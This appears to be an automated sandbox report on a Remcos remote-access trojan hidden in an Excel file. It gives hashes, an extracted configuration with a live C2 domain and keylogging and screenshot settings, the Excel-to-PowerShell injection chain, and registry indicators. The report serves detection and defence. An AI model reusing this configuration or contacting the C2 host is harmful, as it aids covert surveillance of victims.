remcos | 9765bf6f8c394a94d04b26211e43346ed51561171929aedf7183843fe8d1bfeb

General

Target

c4fa78775e976b5e30d4f2fb71d48b068b3dc27d625972296fd5cc28c58eb1c0.xls
Size

32KB
MD5

eb7a80763f59da222984d9f111f45bb4
SHA1

192d549cd2c007453d41c436a03f1947f04e212f
SHA256

c4fa78775e976b5e30d4f2fb71d48b068b3dc27d625972296fd5cc28c58eb1c0
SHA512

56e9c3dbbdc14ed85dce54a644eca5cef874df9492f72937f12407d22dea9a5b7f7efbe273bfeb887d6e8ee54d5af7696d30c37d5bacb35c88b22a5a9ec57813

Score

10^/10

remcos remotehost rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

jacksonmuhammad990.duckdns.org:161

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Remcos-Y3JNVG
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1636	2012	cmd.exe	EXCEL.EXE

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

4 804 powershell.exe
10 948 powershell.exe
Loads dropped DLL 1 IoCs

Processes:

powershell.exe

pid process

948 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 948 set thread context of 1868 948 powershell.exe notepad.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

flow	pid	process
4	804	powershell.exe
10	948	powershell.exe

pid	process
948	powershell.exe

description	pid	process	target process
PID 948 set thread context of 1868	948	powershell.exe	notepad.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 63 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXEiexplore.exeIEXPLORE.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{108582E1-1364-11ED-8306-DA64C5028348} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e02a6ceb70a7d801	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e528c10875d4b347a30c038b2e32007f00000000020000000000106600000001000020000000993acd1829b82287da5ce2a0fb0e8288059aeeb8cd28dbfb93d289cd2bd5b5cc000000000e80000000020000200000000f36eadf95e27d9f1f5883af479aeb1ed4bfb9fa5d080d7a7eeec9b292d0432d20000000c7bde8d0a0bd393a469aa15fa352e05baf6e413baaf51c29ead3df5a1e90e6ba40000000bd626081c9ed5cb622bb0ed9cd413ed358d52d3403184aeea3a191478ef35f8a95c41ec78b1df5bfdeef25acf0d6d25eed770264cc16b3a38af804a8fe6cda6a	iexplore.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e528c10875d4b347a30c038b2e32007f000000000200000000001066000000010000200000007b6f760ba781f9b56aa30985a5d5f1fa14758fa89f6bd17e3907751bce2f4b9c000000000e8000000002000020000000c48910dddd1b965cf78bc29127b3fa38ebff6c11a0c1c95adc5b7571a0a5d817900000004f08da030cfb11bd38bfa99acb63452467bbd8e843bc2aef70abb52e2a5914667c8c3f62569b210dce500f2dea34de9435df34e9b4e2219d8c7311970f4a7a1553f7864b85d46dc4bd86d50b68c951e8ee79f80a304a775df56d571437fdfcb0ab81dba4014edb3ad215f69fb0914c8f8a01b1e1ec86827881570a4f79c2ecf907898582bff5f69d4d75bd6e79c2106340000000bc0d92ebc770bf8f73ec8419d8da19ff7c79e8efa37d645ca95404517a18aa0f4b2771bf99d907d25dae28a74bd2b63fb490d4714ca4fe6a6e97e004ba4dbc5e	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

EXCEL.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2012 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

804 powershell.exe
804 powershell.exe
804 powershell.exe
948 powershell.exe
840 powershell.exe

pid	process
2012	EXCEL.EXE

pid	process
804	powershell.exe
804	powershell.exe
804	powershell.exe
948	powershell.exe
840	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	804	powershell.exe
Token: SeDebugPrivilege	948	powershell.exe
Token: SeDebugPrivilege	840	powershell.exe
Token: SeIncreaseQuotaPrivilege	948	powershell.exe
Token: SeSecurityPrivilege	948	powershell.exe
Token: SeTakeOwnershipPrivilege	948	powershell.exe
Token: SeLoadDriverPrivilege	948	powershell.exe
Token: SeSystemProfilePrivilege	948	powershell.exe
Token: SeSystemtimePrivilege	948	powershell.exe
Token: SeProfSingleProcessPrivilege	948	powershell.exe
Token: SeIncBasePriorityPrivilege	948	powershell.exe
Token: SeCreatePagefilePrivilege	948	powershell.exe
Token: SeBackupPrivilege	948	powershell.exe
Token: SeRestorePrivilege	948	powershell.exe
Token: SeShutdownPrivilege	948	powershell.exe
Token: SeDebugPrivilege	948	powershell.exe
Token: SeSystemEnvironmentPrivilege	948	powershell.exe
Token: SeRemoteShutdownPrivilege	948	powershell.exe
Token: SeUndockPrivilege	948	powershell.exe
Token: SeManageVolumePrivilege	948	powershell.exe
Token: 33	948	powershell.exe
Token: 34	948	powershell.exe
Token: 35	948	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

976 iexplore.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

EXCEL.EXEiexplore.exeIEXPLORE.EXE

pid process

2012 EXCEL.EXE
2012 EXCEL.EXE
2012 EXCEL.EXE
976 iexplore.exe
976 iexplore.exe
1616 IEXPLORE.EXE
1616 IEXPLORE.EXE

pid	process
976	iexplore.exe

pid	process
2012	EXCEL.EXE
2012	EXCEL.EXE
2012	EXCEL.EXE
976	iexplore.exe
976	iexplore.exe
1616	IEXPLORE.EXE
1616	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeiexplore.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2012 wrote to memory of 1636	2012	EXCEL.EXE	cmd.exe
PID 2012 wrote to memory of 1636	2012	EXCEL.EXE	cmd.exe
PID 2012 wrote to memory of 1636	2012	EXCEL.EXE	cmd.exe
PID 2012 wrote to memory of 1636	2012	EXCEL.EXE	cmd.exe
PID 1636 wrote to memory of 804	1636	cmd.exe	powershell.exe
PID 1636 wrote to memory of 804	1636	cmd.exe	powershell.exe
PID 1636 wrote to memory of 804	1636	cmd.exe	powershell.exe
PID 1636 wrote to memory of 804	1636	cmd.exe	powershell.exe
PID 804 wrote to memory of 2040	804	powershell.exe	WScript.exe
PID 804 wrote to memory of 2040	804	powershell.exe	WScript.exe
PID 804 wrote to memory of 2040	804	powershell.exe	WScript.exe
PID 804 wrote to memory of 2040	804	powershell.exe	WScript.exe
PID 976 wrote to memory of 1616	976	iexplore.exe	IEXPLORE.EXE
PID 976 wrote to memory of 1616	976	iexplore.exe	IEXPLORE.EXE
PID 976 wrote to memory of 1616	976	iexplore.exe	IEXPLORE.EXE
PID 976 wrote to memory of 1616	976	iexplore.exe	IEXPLORE.EXE
PID 2040 wrote to memory of 948	2040	WScript.exe	powershell.exe
PID 2040 wrote to memory of 948	2040	WScript.exe	powershell.exe
PID 2040 wrote to memory of 948	2040	WScript.exe	powershell.exe
PID 2040 wrote to memory of 948	2040	WScript.exe	powershell.exe
PID 2040 wrote to memory of 840	2040	WScript.exe	powershell.exe
PID 2040 wrote to memory of 840	2040	WScript.exe	powershell.exe
PID 2040 wrote to memory of 840	2040	WScript.exe	powershell.exe
PID 2040 wrote to memory of 840	2040	WScript.exe	powershell.exe
PID 948 wrote to memory of 1868	948	powershell.exe	notepad.exe
